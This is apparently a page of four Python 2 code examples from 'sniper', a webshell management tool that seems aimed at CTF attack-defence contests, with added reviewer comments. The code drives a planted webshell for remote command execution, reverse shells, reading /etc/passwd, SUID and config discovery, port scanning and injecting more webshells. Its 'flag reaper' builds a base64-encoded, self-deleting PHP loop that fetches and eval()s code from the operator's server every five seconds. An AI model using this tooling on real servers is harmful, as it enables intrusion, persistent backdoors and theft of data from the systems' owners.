Exemplo n.º 1
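 def interactive(self):
     """Run the MySQL sub-prompt until the operator enters ``q``.

     Commands (lower-cased via ``string.lower``; an empty line means ``h``):
     ``h`` help, ``cd`` current database, ``u`` current user, ``v`` server
     version, ``d`` list databases, ``t`` list tables, ``c`` list columns,
     ``e`` run a raw SQL string, ``q`` quit.  Anything else prints an error
     followed by the help text.  Python 2 (``raw_input``, ``string.lower``).

     ``t`` and ``c`` both need a database name: it is taken from
     ``self.database`` (set by ``cd``) or asked for interactively, and the
     command is skipped when neither yields a name.
     """

     def pick_database():
         # Database chosen via [cd], otherwise prompt for one.  Returns ""
         # (after printing the error) when nothing usable was obtained.
         self.get_databases()
         name = self.database
         if name == "":
             name = raw_input("Input database name : ")
         if name == "":
             Log.error(
                 "No database selected! Please input : [cd] command!")
         return name

     self.help()
     while True:
         Log.context("sniper")
         Log.context("mysql")
         command = string.lower(raw_input("=>") or "h")
         if command == "h":
             self.help()
         elif command == "cd":
             self.get_currect_database()
         elif command == "u":
             self.get_currect_user()
         elif command == "v":
             self.get_version()
         elif command == "d":
             self.get_databases()
         elif command == "t":
             database = pick_database()
             if database == "":
                 # Same guard as ``c``: without it the empty name was
                 # passed straight to get_table_from_database.
                 continue
             self.get_table_from_database(database)
         elif command == "c":
             database = pick_database()
             if database == "":
                 continue
             self.get_table_from_database(database)
             table = raw_input("Input table name : ")
             if table == "":
                 Log.error("No tablename inputed!")
                 continue
             self.get_columns_from_table(table, database)
         elif command == "e":
             # The statement is forwarded exactly as typed; there is no
             # client-side validation.  The default is a version probe.
             sql = raw_input("Input your sql : ") or "select @@version;"
             Log.info("Executing sql : [%s]" % (sql))
             self.sql_exec(sql)
         elif command == "q":
             Log.info("Quiting...")
             break
         else:
             Log.error("Unsupported command!")
             self.help()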
Exemplo n.º 2
 def interactive(self):
     """Read lines at a ``$`` prompt and run each through the webshell.

     ``exit`` (compared after ``string.lower``) leaves the loop.  Any other
     line goes to ``self.webshell.auto_exec``, whose result is indexed as
     ``(ok, text)``: ``text`` is printed via ``Log._print`` when ``ok`` is
     truthy and via ``Log.error`` otherwise.  Python 2 (``raw_input``).
     """
     Log.info("Starting interactive shell...")
     while True:
         Log.context("sniper")
         Log.context("shell")
         line = raw_input("$ ")
         if string.lower(line) == "exit":
             Log.info("Exiting shell...")
             break
         outcome = self.webshell.auto_exec(line)
         succeeded, text = outcome[0], outcome[1]
         emit = Log._print if succeeded else Log.error
         emit(text)
Exemplo n.º 3
def main():
    """CLI entry point: ``argv[1..3]`` are the webshell URL, HTTP method and
    password.

    Builds a ``WebShell`` from them (exit status 1 on a wrong argument count,
    2 when ``webshell.working`` is false), prints the help, then loops on a
    ``=>`` prompt.  Each keyword dispatches to one ``WebShell`` helper or to
    a ``Shell``/``Mysql`` sub-prompt; a line matching no keyword is executed
    as a command, locally or on the target depending on ``LOCAL_COMMAND_FLAG``
    (see the final ``else``).  Python 2 (``raw_input``, ``string.lower``,
    ``string.letters``).
    """
    banner()
    if len(sys.argv) != 4:
        show_help()
        # builtin exit() from the site module rather than sys.exit()
        exit(1)
    url = sys.argv[1]
    method = sys.argv[2]
    password = sys.argv[3]
    webshell = WebShell(url, method, password)
    # True: unrecognized input is run on this machine via os.system (the
    # default); False: it is sent to the target.  Toggled by "setl"/"setr".
    LOCAL_COMMAND_FLAG = True
    if not webshell.working:
        Log.error("The webshell cannot work...")
        exit(2)

    main_help()

    while True:
        Log.context("sniper")
        # Keep the raw line: the else branch executes it verbatim; the
        # lower-cased copy is only used for keyword matching.
        context_fresh = raw_input("=>") or "h"
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        elif context == "sh" or context == "shell":
            shell = Shell(webshell)
            shell.interactive()
        elif context == "rsh" or context == "rshell":
            # Prints a listener hint for the operator; ip/port default to
            # this host's address and 8888.
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" %
                           (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            webshell.print_info()
        elif context == "pv" or context == "php_version":
            webshell.get_php_version()
        elif context == "kv" or context == "kernel_version":
            webshell.get_kernel_version()
        elif context == "c" or context == "config":
            Log.info("Detacting config files...")
            webshell.get_config_file()
        elif context == "fwd":
            webshell.get_writable_directory()
        elif context == "gdf":
            webshell.get_disabled_functions()
        elif context == "fwpf":
            webshell.get_writable_php_file()
        elif context == "fsb":
            webshell.get_suid_binaries()
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            # ``args`` is spliced into a remote ``find`` invocation as typed.
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " %
                             (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            webshell.download_advanced(path, args)
        elif context == "dl":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            if not webshell.file_exists(path):
                Log.error("The file [%s] is not exists on the server!" %
                          (path))
                continue
            if webshell.is_directory(path):
                Log.info(
                    "The target file is a directory, using recursion download..."
                )
                filename_filter = raw_input("Input --name '%s' : " %
                                            ("*.php")) or "*.php"
                webshell.download_recursion(path, filename_filter)
            else:
                #filename = path.split("/")[-1]
                #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
                # Log.info("Using root path : [%s] to save!" % (local_path))
                Log.info(
                    "The target file is a single file, starting download...")
                # Remote and local path are the same string (the local-path
                # prompt above is commented out).
                webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input(
                "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            # Only the presence of "/" is checked; hosts and ports are
            # otherwise passed through unvalidated.
            if not "/" in hosts:
                Log.error(
                    "Please use the format IP/MASK , if want to scan a single host , set MASK=32"
                )
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
                              ) or "21,22,25,80,443,445,3389"
            webshell.port_scan(hosts, ports)
        elif context == "aiw":
            # One 16-letter random string seeds both defaults (filename and
            # password), so they are derivable from each other.
            default = random_string(0x10, string.letters)
            filename = raw_input("Filename (.%s.php): " %
                                 (default)) or (".%s.php" % (default))
            password = raw_input("Password (%s): " % (default)) or ("%s" %
                                                                    (default))
            webshell.auto_inject_webshell(filename, password)
        elif context == "r" or context == "read":
            filepath = raw_input(
                "Input file path (/etc/passwd) : ") or "/etc/passwd"
            webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            # NOTE(review): the database password is echoed in cleartext to
            # the log here.
            Log.info("Creating connection by [%s:%s] to [%s]..." %
                     (username, password, ip))
            mysql_connection = Mysql(webshell, ip, username, password)
            if not mysql_connection.function:
                Log.error("The target server cannot support mysql!")
                continue
            if not mysql_connection.connection_flag:
                Log.error("Connection failed!")
                continue
            Log.success("Connection success!")
            # The ``not function`` guard above already rejected "", so this
            # test is always true and the else branch is unreachable.
            if mysql_connection.function != "":
                Log.success("Entering database server interactive mode...")
                mysql_connection.interactive()
            else:
                Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("Quiting...")
            break
        else:
            Log.error("Unsupported function!")
            # NOTE(review): with the default flag every mistyped keyword is
            # handed to os.system on this host as typed.  ``if
            # LOCAL_COMMAND_FLAG:`` is the idiomatic form of this test.
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                webshell.auto_exec_print(context_fresh)
Exemplo n.º 4
def main():
    """CLI entry point: ``argv[1..3]`` are the webshell URL, HTTP method and
    password.

    Builds a ``WebShell`` from them (exit status 1 on a wrong argument count,
    2 when ``webshell.working`` is false), appends the three arguments to
    ``Webshell.txt``, prints the help, then loops on a ``=>`` prompt.  Each
    keyword dispatches to one ``WebShell`` helper or to a ``Shell``/``Mysql``
    sub-prompt; a line matching no keyword is executed as a command, locally
    or on the target depending on ``LOCAL_COMMAND_FLAG`` (see the final
    ``else``).  Python 2 (``raw_input``, ``string.lower``, ``string.letters``,
    the ``"base64"`` str codec).
    """
    banner()
    if len(sys.argv) != 4:
        show_help()
        # builtin exit() from the site module rather than sys.exit()
        exit(1)
    url = sys.argv[1]
    method = sys.argv[2]
    password = sys.argv[3]
    webshell = WebShell(url, method, password)
    # True: unrecognized input is run on this machine via os.system (the
    # default); False: it is sent to the target.  Toggled by "setl"/"setr".
    LOCAL_COMMAND_FLAG = True
    if not webshell.working:
        Log.error("The webshell cannot work...")
        exit(2)

    # NOTE(review): url, method and the webshell password are written in
    # cleartext to ./Webshell.txt (relative to the CWD, default file mode).
    # Treat that file as a credential store.
    Log.info("recording this webshell to the log file...")
    with open("Webshell.txt", "a+") as f:
        log_content = "%s => %s => %s\n" % (url, method, password)
        f.write(log_content)

    main_help()

    while True:
        Log.context("sniper")
        # Keep the raw line: the else branch executes it verbatim; the
        # lower-cased copy is only used for keyword matching.
        context_fresh = raw_input("=>") or "h"
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        elif context == "sh" or context == "shell":
            shell = Shell(webshell)
            shell.interactive()
        elif context == "rsh" or context == "rshell":
            # Prints a listener hint for the operator; ip/port default to
            # this host's address and 8888.
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            ip = raw_input("[IP] : (%s)" %
                           (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            webshell.print_info()
        elif context == "pv" or context == "php_version":
            Log.success(webshell.get_php_version())
        elif context == "kv" or context == "kernel_version":
            Log.success(webshell.get_kernel_version())
        elif context == "c" or context == "config":
            Log.info("Detacting config files...")
            webshell.get_config_file()
        elif context == "fwd":
            webshell.get_writable_directory()
        elif context == "gdf":
            webshell.get_disabled_functions()
        elif context == "fwpf":
            webshell.get_writable_php_file()
        elif context == "fsb":
            webshell.get_suid_binaries()
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            # ``args`` is spliced into a remote ``find`` invocation as typed.
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " %
                             (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            webshell.download_advanced(path, args)
        elif context == "dl":
            path = raw_input(
                "Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            if not webshell.file_exists(path):
                Log.error("The file [%s] is not exists on the server!" %
                          (path))
                continue
            if webshell.is_directory(path):
                Log.info(
                    "The target file is a directory, using recursion download..."
                )
                filename_filter = raw_input("Input --name '%s' : " %
                                            ("*.php")) or "*.php"
                webshell.download_recursion(path, filename_filter)
            else:
                #filename = path.split("/")[-1]
                #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
                # Log.info("Using root path : [%s] to save!" % (local_path))
                Log.info(
                    "The target file is a single file, starting download...")
                # Remote and local path are the same string (the local-path
                # prompt above is commented out).
                webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input(
                "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            # Only the presence of "/" is checked; hosts and ports are
            # otherwise passed through unvalidated.
            if not "/" in hosts:
                Log.error(
                    "Please use the format IP/MASK , if want to scan a single host , set MASK=32"
                )
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)"
                              ) or "21,22,25,80,443,445,3389"
            webshell.port_scan(hosts, ports)
        elif context == "aiw":
            # Default password = md5(md5(salt + filename + salt)); ``md5``
            # and ``salt`` are defined elsewhere in the file.  Anyone who
            # knows ``salt`` and the filename can recompute it.
            default_filename = random_string(0x10, string.letters)
            default_password = md5(
                md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " %
                                 (default_filename)) or (".%s.php" %
                                                         (default_filename))
            password = raw_input("Password (%s): " %
                                 (default_password)) or ("%s" %
                                                         (default_password))
            webshell.auto_inject_webshell(filename, password)
        elif context == "aimw":
            # Same default derivation as "aiw"; differs only in the helper
            # called at the end.
            default_filename = random_string(0x10, string.letters)
            default_password = md5(
                md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " %
                                 (default_filename)) or (".%s.php" %
                                                         (default_filename))
            password = raw_input("Password (%s): " %
                                 (default_password)) or ("%s" %
                                                         (default_password))
            webshell.auto_inject_memery_webshell(filename, password)
        elif context == "fr":
            Log.info("Starting flag reaper...")
            webserver_host = raw_input("[IP] (%s) : " %
                                       (get_ip_address())) or get_ip_address()
            # int() on the raw prompt: a non-numeric answer raises ValueError
            # and ends the whole loop.
            webserver_port = int(raw_input("[PORT] (80) : ") or "80")
            filename = ".%s.php" % (random_string(0x10, string.letters))
            # PHP body: a self-deleting loop that fetches code.txt from the
            # operator's web server and eval()s it every 5 s; the server's
            # access log is what the operator is told to watch below.
            file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (
                webserver_host, webserver_port)
            Log.info("Temp memory phpfile : %s" % (file_content))
            Log.info("Encoding phpfile...")
            # Python 2 str.encode("base64") inserts newlines, hence the
            # replace().
            file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (
                file_content.encode("base64").replace("\n", ""))
            Log.info("Final memory phpfile : %s" % (file_content))
            result = webshell.auto_inject_flag_reaper(filename, file_content)
            if result:
                Log.success(
                    "Please check the web server(%s:%d) log to get your flag!"
                    % (webserver_host, webserver_port))
                Log.info("Tips : tail -f /var/log/apache2/access.log")
            else:
                Log.error("Starting flag reaper failed!")
        elif context == "r" or context == "read":
            filepath = raw_input(
                "Input file path (/etc/passwd) : ") or "/etc/passwd"
            webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            # NOTE(review): the database password is echoed in cleartext to
            # the log here.
            Log.info("Creating connection by [%s:%s] to [%s]..." %
                     (username, password, ip))
            mysql_connection = Mysql(webshell, ip, username, password)
            if not mysql_connection.function:
                Log.error("The target server cannot support mysql!")
                continue
            if not mysql_connection.connection_flag:
                Log.error("Connection failed!")
                continue
            Log.success("Connection success!")
            # The ``not function`` guard above already rejected "", so this
            # test is always true and the else branch is unreachable.
            if mysql_connection.function != "":
                Log.success("Entering database server interactive mode...")
                mysql_connection.interactive()
            else:
                Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("Quiting...")
            break
        else:
            Log.error("Unsupported function!")
            # NOTE(review): with the default flag every mistyped keyword is
            # handed to os.system on this host as typed.  ``if
            # LOCAL_COMMAND_FLAG:`` is the idiomatic form of this test.
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                webshell.auto_exec_print(context_fresh)